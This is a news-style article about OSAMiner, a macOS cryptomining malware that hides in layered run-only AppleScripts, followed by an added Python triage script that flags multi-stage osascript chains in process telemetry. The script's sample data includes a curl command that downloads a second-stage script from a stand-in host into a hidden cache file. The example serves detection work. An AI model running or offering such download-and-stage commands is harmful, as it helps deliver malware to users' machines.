
Cybersecurity startup SentinelOne has documented OSAMiner, a macOS malware family that has been operating since around 2015, ZDNet reported.

OSAMiner infects victim systems and uses them to mine cryptocurrency unnoticed. It “has been active for a long time and has evolved in recent months,” a SentinelOne spokesperson told ZDNet in an email interview. The malware is distributed through pirated applications and is mostly observed in Asia.

While SentinelOne has only recently analyzed the malware, the firm notes that two Chinese security companies reported older versions of it several years earlier. SentinelOne macOS malware researcher Phil Stokes explains that those companies identified and evaluated OSAMiner in August and September 2018, but were only able to uncover a small portion of what it does: their researchers could not access the malware’s full code, which is hidden under layers of run-only AppleScript files. The infection starts when a victim installs a trojanized pirated program; the malware then establishes itself on the system through a series of these scripts. The campaign appears to be most active in Chinese and Asia-Pacific communities, the spokesperson added.

Run-only AppleScript is an unusual choice for malware, but it remains an effective threat to macOS users, according to Stokes: “Run-only AppleScripts are surprisingly rare in the macOS malware world, but both the longevity of and the lack of attention to the macOS.OSAMiner campaign, which has likely been running for at least 5 years, show exactly how powerful run-only AppleScripts can be for evasion and anti-analysis.” A run-only script is compiled with its source stripped (the osacompile -x option), so osadecompile cannot turn it back into human-readable AppleScript. That is what makes this infection chain hard to analyze: rather than reading the code, researchers have to reconstruct what each stage does with other tools, for example by observing the processes and files it touches at run time.
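Because a run-only script yields no source, a practitioner triaging an infection like this has to pivot from the file to its behaviour. The following Python example is added here and is not SentinelOne’s tooling or code from the OSAMiner report: it walks constructed process telemetry and flags osascript processes whose ancestry already contains one or more compiled-script executions, the kind of layered script chain described above. The event format, file paths and PIDs are hypothetical, and the parent/child walk is a generic heuristic rather than any vendor’s detection logic.

```python
"""Behavioural triage for layered run-only AppleScript execution.

Added example, not SentinelOne's code or anything from the OSAMiner report.
A run-only .scpt (osacompile -x) carries no source, so instead of decompiling
we look at process lineage: an osascript process whose ancestors also ran
compiled scripts is a candidate multi-stage script chain worth a closer look.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional

OSASCRIPT = "/usr/bin/osascript"
SCRIPT_SUFFIXES = (".scpt", ".scptd", ".applescript")


@dataclass
class ProcEvent:
    """One process-start record; the field set is a constructed, minimal schema."""
    pid: int
    ppid: int
    exe: str
    argv: List[str]


# Constructed sample telemetry. Paths and PIDs are hypothetical; pids 210, 220
# and 230 form a three-stage script chain, pid 300 is a harmless inline script.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "/sbin/launchd", ["launchd"]),
    ProcEvent(210, 100, OSASCRIPT,
              ["osascript", "/Users/victim/Downloads/Installer.app/Contents/Resources/run.scpt"]),
    ProcEvent(215, 210, "/bin/sh", ["sh", "-c", "curl -fsSL https://example.invalid/s2 -o ~/Library/Caches/.stage2.scpt"]),
    ProcEvent(220, 215, OSASCRIPT, ["osascript", "/Users/victim/Library/Caches/.stage2.scpt"]),
    ProcEvent(230, 220, OSASCRIPT, ["osascript", "/Users/victim/Library/Caches/.stage3.scpt"]),
    ProcEvent(300, 100, OSASCRIPT, ["osascript", "-e", "display dialog \"hello\""]),
]


def script_path(ev: ProcEvent) -> Optional[str]:
    """Return the compiled script file an osascript process runs, or None.

    Inline '-e' invocations and non-osascript processes yield None.
    """
    if ev.exe != OSASCRIPT:
        return None
    for arg in ev.argv[1:]:
        if arg.endswith(SCRIPT_SUFFIXES):
            return arg
    return None


def ancestry(ev: ProcEvent, by_pid: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Return ev's ancestors, nearest parent first, stopping at unknown pids
    and guarding against parent loops in malformed logs."""
    chain: List[ProcEvent] = []
    seen = {ev.pid}
    cur = by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        chain.append(cur)
        seen.add(cur.pid)
        cur = by_pid.get(cur.ppid)
    return chain


def find_script_chains(events: List[ProcEvent], min_stages: int = 2) -> Dict[int, List[str]]:
    """Map each osascript pid to the ordered script files in its lineage
    (oldest ancestor first, itself last) when at least min_stages compiled
    scripts appear. With the default of 2 a lone script run is not reported."""
    by_pid = {e.pid: e for e in events}
    hits: Dict[int, List[str]] = {}
    for ev in events:
        own = script_path(ev)
        if own is None:
            continue
        stages = [p for p in (script_path(a) for a in reversed(ancestry(ev, by_pid))) if p]
        stages.append(own)
        if len(stages) >= min_stages:
            hits[ev.pid] = stages
    return hits


if __name__ == "__main__":
    for pid, stages in find_script_chains(SAMPLE_EVENTS).items():
        print(f"pid {pid}: {len(stages)}-stage script chain")
        for depth, path in enumerate(stages, 1):
            print(f"  stage {depth}: {path}")
```

Feed it whatever process-start telemetry your EDR or macOS logging exports, mapped onto the `ProcEvent` fields. Treat a hit as a triage signal, not a verdict: legitimate automation can also launch osascript from osascript, so the value is in surfacing the chain and the script paths (here a cache directory and dot-prefixed names) for a human to pull and run in a sandbox, since the files themselves will not decompile.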
